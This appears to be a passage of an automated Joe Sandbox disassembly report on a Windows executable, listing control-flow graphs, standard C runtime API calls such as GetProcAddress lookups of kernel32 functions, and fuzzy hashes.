                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastWrite
                                                                        • String ID:
                                                                        • API String ID: 442123175-0
                                                                        • Opcode ID: 8095f470f6903e258b8f6f0839f3e2235ead8a8a1ead694f346f3e65759ba516
                                                                        • Instruction ID: a114f9a06ca0eac217a92c4e77498363c47f94169861028b6bba09bc18543e50
                                                                        • Opcode Fuzzy Hash: 8095f470f6903e258b8f6f0839f3e2235ead8a8a1ead694f346f3e65759ba516
                                                                        • Instruction Fuzzy Hash: 6A216D35A002199BCF15CF2ADD809E9B7F9EB48301F2444EAE946D7311FA30DE42CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1462 bd11d1-bd11d6 1463 bd11d8-bd11f0 1462->1463 1464 bd11fe-bd1207 1463->1464 1465 bd11f2-bd11f6 1463->1465 1467 bd1219 1464->1467 1468 bd1209-bd120c 1464->1468 1465->1464 1466 bd11f8-bd11fc 1465->1466 1469 bd1273-bd1277 1466->1469 1472 bd121b-bd1228 GetStdHandle 1467->1472 1470 bd120e-bd1213 1468->1470 1471 bd1215-bd1217 1468->1471 1469->1463 1475 bd127d-bd1280 1469->1475 1470->1472 1471->1472 1473 bd122a-bd122c 1472->1473 1474 bd1255-bd1267 1472->1474 1473->1474 1476 bd122e-bd1237 GetFileType 1473->1476 1474->1469 1477 bd1269-bd126c 1474->1477 1476->1474 1478 bd1239-bd1242 1476->1478 1477->1469 1479 bd124a-bd124d 1478->1479 1480 bd1244-bd1248 1478->1480 1479->1469 1481 bd124f-bd1253 1479->1481 1480->1469 1481->1469
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00BD10C0,00BED688), ref: 00BD121D
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00BD10C0,00BED688), ref: 00BD122F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID:
                                                                        • API String ID: 3000768030-0
                                                                        • Opcode ID: 21f9973384d214edb9cb09d4b4c41433d0f0eeac667ad9342b417648a8a68716
                                                                        • Instruction ID: 16e28315ac1b8674686ed68ee3a8e52b5406b73db211480b82ec56fd7b0b571e
                                                                        • Opcode Fuzzy Hash: 21f9973384d214edb9cb09d4b4c41433d0f0eeac667ad9342b417648a8a68716
                                                                        • Instruction Fuzzy Hash: 5011A5216047516ACB308E3E8CC8622FAD4E756330B380F9BD5B6D77F2E621D982D654

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1482 bd6185-bd619d call bd6669 1485 bd619f-bd61a6 1482->1485 1486 bd61b3-bd61c9 SetFilePointerEx 1482->1486 1487 bd61ad-bd61b1 1485->1487 1488 bd61de-bd61e8 1486->1488 1489 bd61cb-bd61dc GetLastError call bc9c80 1486->1489 1492 bd6204-bd6207 1487->1492 1488->1487 1491 bd61ea-bd61ff 1488->1491 1489->1487 1491->1492
                                                                        APIs
                                                                        • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00BD603D,00000000,?,?,00000002,00000000), ref: 00BD61C1
                                                                        • GetLastError.KERNEL32(00000000,?,00BD603D,00000000,?,?,00000002,00000000,?,00BD7018,?,00000000,00000000,00000002,?,?), ref: 00BD61CE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastPointer
                                                                        • String ID:
                                                                        • API String ID: 2976181284-0
                                                                        • Opcode ID: b5e4221fb8dbab6161c1f2c01fa8230acfcefd0397229a11012aac2e28afbb94
                                                                        • Instruction ID: 7d6d155ef116f40900b48ff950136ca0946feb4db15a7be91d2bca3bda23b5f2
                                                                        • Opcode Fuzzy Hash: b5e4221fb8dbab6161c1f2c01fa8230acfcefd0397229a11012aac2e28afbb94
                                                                        • Instruction Fuzzy Hash: 02012632610615AFCF058F59DC45D9E7FA9EF81330F240289F811AB391FA71ED518B90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1494 bd0562-bd0571 call bd08d1 1497 bd059a-bd05b4 call bd05fe LCMapStringW 1494->1497 1498 bd0573-bd0598 LCMapStringEx 1494->1498 1502 bd05ba-bd05bc 1497->1502 1498->1502
                                                                        APIs
                                                                        • LCMapStringEx.KERNELBASE(?,00BD0F75,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00BD0596
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00BD0F75,?,?,-00000008,?,00000000), ref: 00BD05B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID:
                                                                        • API String ID: 2568140703-0
                                                                        • Opcode ID: 1b08b1d2a2d79f13d6fb5d438ddd4dad2b35bc1523c2260d744902f582736b8c
                                                                        • Instruction ID: 122c7b6a167632991ae3fc314762e4551d2b87ca3ad0dd997677432a60a1a328
                                                                        • Opcode Fuzzy Hash: 1b08b1d2a2d79f13d6fb5d438ddd4dad2b35bc1523c2260d744902f582736b8c
                                                                        • Instruction Fuzzy Hash: 81F0683241021ABBCF126F90EC05ADE7F66FF58365F054151BE1926120DB36C971EB90
                                                                        APIs
                                                                        • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00BD6C71,00000000,CF830579,00BED7C8,0000000C,00BD6BF9,00BCAA61,?), ref: 00BD6B39
                                                                        • GetLastError.KERNEL32(?,00BD6C71,00000000,CF830579,00BED7C8,0000000C,00BD6BF9,00BCAA61,?), ref: 00BD6B43
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseErrorHandleLast
                                                                        • String ID:
                                                                        • API String ID: 918212764-0
                                                                        • Opcode ID: 1b3eb0aa9b1cf16d6e171edd2001c7f80ef3c2f2609c55106651c96ce1965ca1
                                                                        • Instruction ID: 84e31735fe25b79512224ee58026d61412215c4329722410ab3e721e7f5fe726
                                                                        • Opcode Fuzzy Hash: 1b3eb0aa9b1cf16d6e171edd2001c7f80ef3c2f2609c55106651c96ce1965ca1
                                                                        • Instruction Fuzzy Hash: D911E5336152101AD6252674A887BBEEBD9CBA2734F2502DFFD14DB3D2FE60D8418295
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02f74d7069a038fcc0f43f124c2b94bba5bf20f184131f93dc109b188632c3ba
                                                                        • Instruction ID: 8966bb46ef05481b2eb341f2e8a1e9f55531a2a9e616ae1b6e215b6b9f6bc225
                                                                        • Opcode Fuzzy Hash: 02f74d7069a038fcc0f43f124c2b94bba5bf20f184131f93dc109b188632c3ba
                                                                        • Instruction Fuzzy Hash: D2518075A00208AFDB14DF58C886FAEBBE1EF99324F24819DF8485B352D7719E41CB90
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000083,?,00000005,00BD16EC,?), ref: 00BD189D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-0
                                                                        • Opcode ID: d23d81d90928cfeb5b51227decf3f19486138605da341397c86e11a1a9e6cd0e
                                                                        • Instruction ID: 3590ad9af99fbc3053ae4c8bf89498315085409f518770837a2b4a8dfb8ca07e
                                                                        • Opcode Fuzzy Hash: d23d81d90928cfeb5b51227decf3f19486138605da341397c86e11a1a9e6cd0e
                                                                        • Instruction Fuzzy Hash: 865136B1908158BADB118A6CCC94BE9FBEDEB15300F1405EAE59987282E3359D46DB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06794c4b8397599f91764bb65660cc584358ab57a7ae7f7e40e9dce82d94055e
                                                                        • Instruction ID: 7076d17076d3b6d01e5f84379c63ff84461cfc09d1b7473522d7917ac4173def
                                                                        • Opcode Fuzzy Hash: 06794c4b8397599f91764bb65660cc584358ab57a7ae7f7e40e9dce82d94055e
                                                                        • Instruction Fuzzy Hash: EA31523291011BABCB25CF68D9909FDF7F9FF09324B1441AAE502A7690DB71E954CB90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __wsopen_s
                                                                        • String ID:
                                                                        • API String ID: 3347428461-0
                                                                        • Opcode ID: aa5934f764117d8f5563198767bfb6d3eba3c2ac9465a642542327cec8ccb5c9
                                                                        • Instruction ID: 25cfd14940a14ec7435a278685c9ddab4863126d6cb408feea331e042f7ade2d
                                                                        • Opcode Fuzzy Hash: aa5934f764117d8f5563198767bfb6d3eba3c2ac9465a642542327cec8ccb5c9
                                                                        • Instruction Fuzzy Hash: 32113D7190410AAFCB05DF58E9419DB7BF5EF48304F1540AAF815AB311EA71E911CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalLeaveSection
                                                                        • String ID:
                                                                        • API String ID: 3988221542-0
                                                                        • Opcode ID: 9085d8865ce97a83106842606b3a8ce00564651a7ab9b772d941b95fdf82524c
                                                                        • Instruction ID: f7c46643bdced7afd88d1108ddc14f9b5bd48742e6f5e4b1f4c0ed4433a31582
                                                                        • Opcode Fuzzy Hash: 9085d8865ce97a83106842606b3a8ce00564651a7ab9b772d941b95fdf82524c
                                                                        • Instruction Fuzzy Hash: F5F06232A186478BCB259A78ED75BF8BBE0FF01338F2442FED056954D1CB924D10D610
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00BC990C,?,00BD97AE,C0C2D04E,00000000,?,00BD5F80,00000000,00BC990C,?,EDF9CBD8,?,?,00BC99E6), ref: 00BCF7AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: c6197f4cb7304f86e2833f13dbdec429ff5e48beec1bc42b660aef076b064c3d
                                                                        • Instruction ID: dec58b8cbf1d4468ef2475e1c94589e198b5ff3a1efed6446e7c09a605d83492
                                                                        • Opcode Fuzzy Hash: c6197f4cb7304f86e2833f13dbdec429ff5e48beec1bc42b660aef076b064c3d
                                                                        • Instruction Fuzzy Hash: B4E06D322052666BEB2137669C45FBA7ACADF527A0F2521FAAC45A74D0CF64DC0281E1
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00BDD9F2,?,?,00000000,?,00BDD9F2,00000000,0000000C), ref: 00BDDD6B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 1229e7d83d10bb5b5499c3883920884e92c6f271f806f41e0f55359d8f562ff0
                                                                        • Instruction ID: 6b063c5c7905e72dbf870c6fa88d1a62c276208e5bb4340f6319cfcbf72ea439
                                                                        • Opcode Fuzzy Hash: 1229e7d83d10bb5b5499c3883920884e92c6f271f806f41e0f55359d8f562ff0
                                                                        • Instruction Fuzzy Hash: DAD06C3201024DBBDF028F84DC46EDA3FAAFB48714F014000FA1856020C732E862EB90
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BC15E2
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BC15F0
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BC1601
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BC1612
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BC1623
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BC1634
                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00BC1645
                                                                        • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BC1656
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00BC1667
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BC1678
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BC1689
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BC169A
                                                                        • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BC16AB
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BC16BC
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BC16CD
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BC16DE
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BC16EF
                                                                        • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00BC1700
                                                                        • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00BC1711
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00BC1722
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00BC1733
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00BC1744
                                                                        • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00BC1755
                                                                        • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00BC1766
                                                                        • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00BC1777
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00BC1788
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BC1799
                                                                        • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00BC17AA
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BC17BB
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BC17CC
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00BC17DD
                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BC17EE
                                                                        • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00BC17FF
                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BC1810
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00BC1821
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00BC1832
                                                                        • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00BC1843
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00BC1854
                                                                        • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00BC1865
                                                                        • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00BC1876
                                                                        • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00BC1887
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                        • API String ID: 667068680-295688737
                                                                        • Opcode ID: 3b002ab02ea2afa63cba024747af54f9b24c7414c03de2906c960edbd9c72649
                                                                        • Instruction ID: 9a7d139587a38de7decb06bb1f7d5ed27d12cdc94d573c2afb7d72f25dae122b
                                                                        • Opcode Fuzzy Hash: 3b002ab02ea2afa63cba024747af54f9b24c7414c03de2906c960edbd9c72649
                                                                        • Instruction Fuzzy Hash: BA6128B1962790AFD7406FBEAC4E8E63EE8BA697023408556B105D7272EFF49045CF50
                                                                        APIs
                                                                        • std::_Facet_Register.LIBCPMT ref: 00BB535D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BB5568
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00BB57A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Facet_Lockit::_Lockit::~_Register
